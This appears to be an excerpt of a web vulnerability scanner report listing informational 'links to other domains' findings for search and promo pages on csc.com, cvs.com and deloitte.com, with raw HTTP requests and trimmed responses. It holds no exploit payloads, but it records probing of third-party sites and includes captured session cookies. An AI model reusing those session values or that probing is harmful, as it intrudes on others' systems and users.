<a id="ctl00_rptFooterLinks_ctl01_hypFooterElements" href="http://www.pg.com/terms.html" target="_blank">Terms & Conditions</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl02_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl02_hypFooterElements" href="http://www.pg.com/privacy/english/privacy_notice.html" target="_blank">Privacy Statement</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl03_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl03_hypFooterElements" href="http://www.pg.com/news/index.jhtml" target="_blank">Press</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl04_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl04_hypFooterElements" href="http://www.covergirl.ca/en_ca/" target="_blank">Canada Site</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl09_liFooterLink" class="facebook">
<a id="ctl00_rptFooterLinks_ctl09_hypFooterElements" href="http://www.facebook.com/covergirl" target="_blank">Facebook</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl10_liFooterLink" class="youtube">
<a id="ctl00_rptFooterLinks_ctl10_hypFooterElements" href="http://www.youtube.com/covergirl" target="_blank">YouTube</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl11_liFooterLink" class="twitter last">
<a id="ctl00_rptFooterLinks_ctl11_hypFooterElements" href="http://www.twitter.com/covergirl" target="_blank">Twitter</a>
...[SNIP]...
</script>

<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

19.82. http://www.csc.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.csc.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.csc.com/search?q=xss

The response contains the following links to other domains:

http://computersciences.112.2o7.net/b/ss/csccomdev/1/H.15.1--NS/0
http://www.omniture.com/

Request

Response

19.83. http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cvs.com
Path:	/CVSApp/promoContent/promoLandingTemplate.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google

The response contains the following links to other domains:

http://cvs.shoplocal.com/cvs/new_user_entry.aspx?action=entryflash&
http://get.adobe.com/reader/
http://print.coupons.com/alink.asp?go=14415oj9710
http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryCosmetics_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryFragrances_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHairAccessories_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHairAppliances_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHairCare_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHairColor_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHealthySkinCare_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHosiery_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategorySkinCare_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategorySunCare_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2FacebookLink_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2JoinNowLink_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2JoinTheConversationLink_1
http://view.atdmt.com/action/msrcvs_2011ECBCQ2LinktotheCircular_1
http://view.atdmt.com/action/msrcvs_2011ECBCQ2LiveChat_1
http://view.atdmt.com/action/msrcvs_2011ECBCQ2MeetTheBoardLink_1
http://view.atdmt.com/action/msrcvs_2011ECBCQ2NiveaShopNowLink_1
http://view.atdmt.com/action/msrcvs_2011ECBCQ2TwitterLink_6
http://view.atdmt.com/action/msrcvs_2011ECBCQ2YouTubeChannelLink_6
http://view.atdmt.com/iaction/msrcvs_2011ECBCQ2BCLandingPage_6
http://vipps.nabp.net/verify.asp
http://www.cvscaremark.com/
http://www.cvscaremark.com/careers
http://www.cvscaremark.com/community
http://www.cvscaremark.com/investors
http://www.cvscaremark.com/newsroom
http://www.cvscaremark.com/patient-privacy
http://www.cvscaremarkrealty.com/
http://www.cvsphoto.com/home.aspx
http://www.cvssuppliers.com/
http://www.minuteclinic.com/
https://view.atdmt.com/action/msrcvs_2011ECBCQ2ExtraCareEmail_6

Request

GET /CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google HTTP/1.1
Host: www.cvs.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:40 GMT
Server: Apache-Coyote/1.1
X-HP-CAM-COLOR: V=1;ServerAddr=HUTy7wKKcZBJ+snDqdX2/g==;GUID=1|v2-QkLk0k1KwHzJd1VhmMdZIuGGBhJY04BWxnXwFEE7mWgY1E9PA8MxLexKjvy9O|L0NWU0FwcC9wcm9tb0NvbnRlbnQvcHJvbW9MYW5kaW5nVGVtcGxhdGUuanNw
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:45:41 GMT
Vary: Accept-Encoding
Content-Length: 55279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta
...[SNIP]...
<li id="photo"><a href="http://www.cvsphoto.com/home.aspx" rel="external" target="_blank" title="Opens CVS Photo Center external site in a new window" onmouseover="document.getElementById('photocentericon').src='/CVSApp/images/common/photo_on.png'" onfocus="document.getElementById('photocentericon').src='/CVSApp/images/common/photo_on.png'" onmouseout="document.getElementById('photocentericon').src='/CVSApp/images/common/photo.png'" onblur="document.getElementById('photocentericon').src='/CVSApp/images/common/photo.png'"><img src="/CVSApp/images/common/photo.png" alt="CVS Photo Center" id="photocentericon" />
...[SNIP]...
<li><a href="http://print.coupons.com/alink.asp?go=14415oj9710" rel="external" target="_blank" title="Opens In-store Coupons external site in a new window">In-store Coupons<span class="hidden">
...[SNIP]...
<noscript><iframe src="http://view.atdmt.com/iaction/msrcvs_2011ECBCQ2BCLandingPage_6" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<div class="promo"><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryCosmetics_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/cosmetics.jpg" alt="Cosmetics" /></a><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategorySkinCare_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/skincare.jpg" alt="Skin Care" /></a><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHairCare_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/hair.jpg" alt="Hair Care" />
...[SNIP]...
<div class="promo"><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryFragrances_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/fragrance.jpg" alt="Fragrances" /></a><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHairColor_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/haircolor.jpg" alt="Hair Color" /></a><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHairAppliances_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/appliances.jpg" alt="Hair Appliances" />
...[SNIP]...
<div class="promo"><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHairAccessories_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/hairaccessories.jpg" alt="Hair Accessories" /></a><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHosiery_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/hosiery.jpg" alt="Hosiery" /></a><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategorySunCare_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/suncare.jpg" alt="Sun Care" />
...[SNIP]...
<div class="promo"><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryHealthySkinCare_6" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/healthyskincare.jpg" alt="Healthy Skin Care" />
...[SNIP]...
<img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/receipt2.jpg" width="294" height="55" /><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2LinktotheCircular_1" onClick="pixel_conversion('3093');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/weeklyad1.jpg" width="354" height="55" />
...[SNIP]...
<br /><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2MeetTheBoardLink_1" onclick="dcsMultiTrack('DCS.dcsuri','/cvsbeautyclub','WT.ti','MeetBoard','WT.sp','Rx;OTC','WT.ac','BCLand_MeetBoard');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/meetboard_button.jpg" style="margin-left: 40px;"/>
...[SNIP]...
<td><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2LiveChat_1" target="_blank"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/board3.jpg" width="222" height="423"/>
...[SNIP]...
<img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/sponsors.jpg" alt="" width="184" height="42" /><a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2NiveaShopNowLink_1"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/sponsor1.jpg" alt="" width="85" height="42" />
...[SNIP]...
<br />
<a href="https://view.atdmt.com/action/msrcvs_2011ECBCQ2ExtraCareEmail_6" onclick="dcsMultiTrack('DCS.dcsuri','/email','WT.ti','Email Sign Up','WT.sp','Rx;OTC','WT.ac','BCLand_Emailsignup');"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/email-new.jpg" alt="Sign up today >" width="224" height="194" longdesc="Sign up for ExtraCare email & get coupons, tips and .new produc
...[SNIP]...
<br />
<a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2FacebookLink_6" onclick="dcsMultiTrack('DCS.dcsuri','/cvsbeautyclub','WT.ti','Facebook','WT.sp','Rx;OTC','WT.ac','BCLand_Facebook');" rel="external" target="_blank" title="Opens Facebook BeautyClub external site in a new window"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/facebook.jpg" alt="Facebook" width="36" height="45" />
...[SNIP]...
</a>

<a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2TwitterLink_6" onclick="dcsMultiTrack('DCS.dcsuri','/cvsbeautyclub','WT.ti','Twitter','WT.sp','Rx;OTC','WT.ac','BCLand_Twitter');" rel="external" target="_blank" title="Opens Twitter external site in a new window"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/twitter.jpg" alt="Twitter" width="38" height="45" />
...[SNIP]...
</a>

<a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2YouTubeChannelLink_6" onclick="dcsMultiTrack('DCS.dcsuri','/CVSPharmacyVideos','WT.ti','YouTube','WT.sp','Rx;OTC','WT.ac','BCLand_YouTube');" rel="external" target="_blank" title="Opens Youtube external site in a new window"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/youtube.jpg" alt="YouTube" width="49" height="45" />
...[SNIP]...
<br />
<a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2JoinTheConversationLink_1" style="color:#e93688" onclick="dcsMultiTrack('DCS.dcsuri','/cvsbeautyclub','WT.ti','Facebook','WT.sp','Rx;OTC','WT.ac','BCLand_Facebook');" rel="external" target="_blank" title="Opens Facebook external site in a new window">Join the conversation ><span class="hidden">
...[SNIP]...
<br />
<a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2JoinNowLink_6"><img src="/CVSApp/cvscontent/landingpages/extracare/ec11021_bc/joinnow.gif" alt="Join now >" width="224" height="58" />
...[SNIP]...
<span class="footer_text grey">*The following categories qualify towards your beauty purchases: <a href="http://view.atdmt.com/action/msrcvs_2011ECBCQ2CategoryCosmetics_6">Cosmetics</a>
...[SNIP]...
<li><a href="http://www.minuteclinic.com" target="_blank" title="Opens MinuteClinic external site in a new window" onclick="dcsMultiTrack('DCS.dcsuri','/minuteclinic/default.aspx','WT.ti','Minute Clinic','WT.sp','Rx;OTC');window.open('http://www.minuteclinic.com');return false;">MinuteClinic</a>
...[SNIP]...
<li><a href="http://www.cvsphoto.com/home.aspx" target="_blank" title="Opens CVS Photo external site in a new window">CVS Photo</a></li>
<li><a href="http://cvs.shoplocal.com/cvs/new_user_entry.aspx?action=entryflash&" target="_blank" title="Opens Weekly Store Ads external site in a new window" onclick="dcsMultiTrack('DCS.dcsuri','/shoplocal/circular/default.aspx','WT.ti','Store Circular','WT.sp','Rx;OTC');window.open('http://cvs.shoplocal.com/cvs/new_user_entry.aspx?action=entryflash&');return false;">Weekly Store Ads</a>
...[SNIP]...
<li><a href="http://www.cvscaremark.com" target="_blank" title="Opens CVS Caremark external site in a new window">CVS Caremark</a>
...[SNIP]...
<li><a href="http://www.cvscaremark.com/careers" target="_blank" title="Opens CVS Caremark Careers external site in a new window">Careers</a></li>
<li><a href="http://www.cvscaremark.com/community" target="_blank" title="Opens CVS Caremark Community external site in a new window">Community</a></li>
<li><a href="http://www.cvscaremark.com/investors" target="_blank" title="Opens CVS Caremark Investors external site in a new window">Investors</a></li>
<li><a href="http://www.cvscaremark.com/patient-privacy" target="_blank" title="Opens CVS Caremark Patient Privacy external site in a new window">Patient Privacy</a>
...[SNIP]...
<span class="hidden"><a href="http://get.adobe.com/reader/" rel="external" target="_blank" title="Opens Adobe external site in a new window">Get Adobe PDF Reader</a>
...[SNIP]...
<li><a href="http://www.cvscaremark.com/newsroom" target="_blank" title="Opens CVS Caremark Newsroom external site in a new window">Newsroom</a></li>
<li><a href="http://www.cvscaremarkrealty.com" target="_blank" title="Opens CVS Real Estate external site in a new window">Real Estate</a>
...[SNIP]...
<li><a href="http://www.cvssuppliers.com" target="_blank" title="Opens CVS Suppliers external site in a new window">Suppliers</a>
...[SNIP]...
<div id="vipps" class="lnk_cont_gry">
<a href="http://vipps.nabp.net/verify.asp" target="_blank" title="Opens VIPPS external site in a new window"><img src="/CVSApp/images/common/logo_footer.gif" alt="VIPPS" />
...[SNIP]...

19.84. http://www.cvs.com/CVSApp/search/search.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cvs.com
Path:	/CVSApp/search/search.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.cvs.com/CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0

The response contains the following links to other domains:

http://cvs.shoplocal.com/cvs/new_user_entry.aspx?action=entryflash&
http://get.adobe.com/reader/
http://print.coupons.com/alink.asp?go=14415oj9710
http://vipps.nabp.net/verify.asp
http://www.cvscaremark.com/
http://www.cvscaremark.com/careers
http://www.cvscaremark.com/community
http://www.cvscaremark.com/investors
http://www.cvscaremark.com/newsroom
http://www.cvscaremark.com/patient-privacy
http://www.cvscaremarkrealty.com/
http://www.cvsphoto.com/home.aspx
http://www.cvssuppliers.com/
http://www.minuteclinic.com/

Request

GET /CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0 HTTP/1.1
Host: www.cvs.com
Proxy-Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345545800:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:19 GMT
Server: Apache-Coyote/1.1
X-HP-CAM-COLOR: V=1;ServerAddr=HUTy7wKKcZBJ+snDqdX2/g==;GUID=1|v2-QkLk0k1KwHzJd1VhmMdZIuGGBhJY04BWxnXwFEE7mWgY1E9PA8MxLexKjvy9O|L0NWU0FwcC9zZWFyY2gvc2VhcmNoLmpzcA..
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:47:19 GMT
Vary: Accept-Encoding
Content-Length: 49652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- ************************** search.jsp FRAGMENT STARTS *******************
...[SNIP]...
<li id="photo"><a href="http://www.cvsphoto.com/home.aspx" rel="external" target="_blank" title="Opens CVS Photo Center external site in a new window" onmouseover="document.getElementById('photocentericon').src='/CVSApp/images/common/photo_on.png'" onfocus="document.getElementById('photocentericon').src='/CVSApp/images/common/photo_on.png'" onmouseout="document.getElementById('photocentericon').src='/CVSApp/images/common/photo.png'" onblur="document.getElementById('photocentericon').src='/CVSApp/images/common/photo.png'"><img src="/CVSApp/images/common/photo.png" alt="CVS Photo Center" id="photocentericon" />
...[SNIP]...
<li><a href="http://print.coupons.com/alink.asp?go=14415oj9710" rel="external" target="_blank" title="Opens In-store Coupons external site in a new window">In-store Coupons<span class="hidden">
...[SNIP]...
<li><a href="http://www.minuteclinic.com" target="_blank" title="Opens MinuteClinic external site in a new window" onclick="dcsMultiTrack('DCS.dcsuri','/minuteclinic/default.aspx','WT.ti','Minute Clinic','WT.sp','Rx;OTC');window.open('http://www.minuteclinic.com');return false;">MinuteClinic</a>
...[SNIP]...
<li><a href="http://www.cvsphoto.com/home.aspx" target="_blank" title="Opens CVS Photo external site in a new window">CVS Photo</a></li>
<li><a href="http://cvs.shoplocal.com/cvs/new_user_entry.aspx?action=entryflash&" target="_blank" title="Opens Weekly Store Ads external site in a new window" onclick="dcsMultiTrack('DCS.dcsuri','/shoplocal/circular/default.aspx','WT.ti','Store Circular','WT.sp','Rx;OTC');window.open('http://cvs.shoplocal.com/cvs/new_user_entry.aspx?action=entryflash&');return false;">Weekly Store Ads</a>
...[SNIP]...
<li><a href="http://www.cvscaremark.com" target="_blank" title="Opens CVS Caremark external site in a new window">CVS Caremark</a>
...[SNIP]...
<li><a href="http://www.cvscaremark.com/careers" target="_blank" title="Opens CVS Caremark Careers external site in a new window">Careers</a></li>
<li><a href="http://www.cvscaremark.com/community" target="_blank" title="Opens CVS Caremark Community external site in a new window">Community</a></li>
<li><a href="http://www.cvscaremark.com/investors" target="_blank" title="Opens CVS Caremark Investors external site in a new window">Investors</a></li>
<li><a href="http://www.cvscaremark.com/patient-privacy" target="_blank" title="Opens CVS Caremark Patient Privacy external site in a new window">Patient Privacy</a>
...[SNIP]...
<span class="hidden"><a href="http://get.adobe.com/reader/" rel="external" target="_blank" title="Opens Adobe external site in a new window">Get Adobe PDF Reader</a>
...[SNIP]...
<li><a href="http://www.cvscaremark.com/newsroom" target="_blank" title="Opens CVS Caremark Newsroom external site in a new window">Newsroom</a></li>
<li><a href="http://www.cvscaremarkrealty.com" target="_blank" title="Opens CVS Real Estate external site in a new window">Real Estate</a>
...[SNIP]...
<li><a href="http://www.cvssuppliers.com" target="_blank" title="Opens CVS Suppliers external site in a new window">Suppliers</a>
...[SNIP]...
<div id="vipps" class="lnk_cont_gry">
<a href="http://vipps.nabp.net/verify.asp" target="_blank" title="Opens VIPPS external site in a new window"><img src="/CVSApp/images/common/logo_footer.gif" alt="VIPPS" />
...[SNIP]...

19.85. http://www.deloitte.com/view/en_US/us/search/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/view/en_US/us/search/index.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.deloitte.com/view/en_US/us/search/index.htm?searchKeywordsField=xss&searchKeywordsFieldDefault=Search&searchBtn.x=0&searchBtn.y=0

The response contains the following links to other domains:

http://deloitte.122.2o7.net/b/ss/deloittecomnewplatformprod/1/H.2-pdv-2/15535650?...c1=us&v3=en&c2=en&c3=us;en&c5=/view/en_us/us/search/index.htm&c25=/view/en_us/us/search/index.htm&ch=home%20page&h1=view
http://secure.quantserve.com/pixel/p-33Ko2HMIENRZ2.gif
http://secure.quantserve.com/quant.js
http://www.addthis.com/bookmark.php
https://er0.deloitteonline.com/dol/login.aspx
https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0

Request

GET /view/en_US/us/search/index.htm?searchKeywordsField=xss&searchKeywordsFieldDefault=Search&searchBtn.x=0&searchBtn.y=0 HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/Insights/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.6.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=100; SC_LINKS=%5B%5BB%5D%5D; s_nr=1315345946709-Repeat; s_invisit=true; s_ppg=us%3Ainsights; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Ainsights%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fdeloitte-ecm-cm-dpm-web%25252Fimages%25252Fdcom%25252Fbtn_go.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 50706
Date: Tue, 06 Sep 2011 16:52:27 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<li
>
<a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a>
...[SNIP]...
<script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script> <noscript><img src="//secure.quantserve.com/pixel/p-33Ko2HMIENRZ2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>
...[SNIP]...
<div id="subTools">

           <a href='http://www.addthis.com/bookmark.php' onmouseover="var flag2 = loadScript('http://s7.addthis.com/js/250/addthis_widget.js'); if(flag2 == true){return addthis_open(this, '', '[URL]', '[TITLE]');}" onclick=" if(flag2 == true){return addthis_sendto();}" >
               <img src="/deloitte-ecm-cm-dpm-web/images/dcom/i_tool_social.gif" alt='Bookmark' title='Bookmark' />
...[SNIP]...
<noscript>


       <img src="http://deloitte.122.2o7.net/b/ss/deloittecomnewplatformprod/1/H.2-pdv-2/15535650?...c1=us&v3=en&c2=en&c3=us;en&c5=/view/en_us/us/search/index.htm&c25=/view/en_us/us/search/index.htm&ch=home%20page&h1=view#en_us#us#search#index.htm?searchkeywordsfielddefault=search&searchbtn.x=0&searchbtn.y=0&searchkeywordsfield=xss&c11=0&c34=home&c35=channel&c14=31f8ad0eea0d6110VgnVCM100000ba42f00aRCRD&nullc7=xss&" width="1" height="1" border="0" />
   </noscript>
...[SNIP]...

19.86. http://www.deloitte.com/view/en_US/us/search/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/view/en_US/us/search/index.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.deloitte.com/view/en_US/us/search/index.htm?searchKeywordsField=broadbacd+ip+cable&searchKeywordsFieldDefault=Search&searchBtn.x=0&searchBtn.y=0

The response contains the following links to other domains:

http://deloitte.122.2o7.net/b/ss/deloittecomnewplatformprod/1/H.2-pdv-2/266170682?...c1=us&v3=en&c2=en&c3=us;en&c5=/view/en_us/us/search/index.htm&c25=/view/en_us/us/search/index.htm&ch=home%20page&h1=view
http://secure.quantserve.com/pixel/p-33Ko2HMIENRZ2.gif
http://secure.quantserve.com/quant.js
http://www.addthis.com/bookmark.php
https://er0.deloitteonline.com/dol/login.aspx
https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0

Request

GET /view/en_US/us/search/index.htm?searchKeywordsField=broadbacd+ip+cable&searchKeywordsFieldDefault=Search&searchBtn.x=0&searchBtn.y=0 HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/search/index.htm?searchKeywordsField=xss&searchKeywordsFieldDefault=Search&searchBtn.x=0&searchBtn.y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.8.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=100; SC_LINKS=%5B%5BB%5D%5D; s_nr=1315345956484-Repeat; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fdeloitte-ecm-cm-dpm-web%25252Fimages%25252Fdcom%25252Fbtn_go.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:52:39 GMT
Content-Length: 51295
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<li
>
<a href="https://er0.deloitteonline.com/dol/login.aspx"target='_blank'>Clients</a>
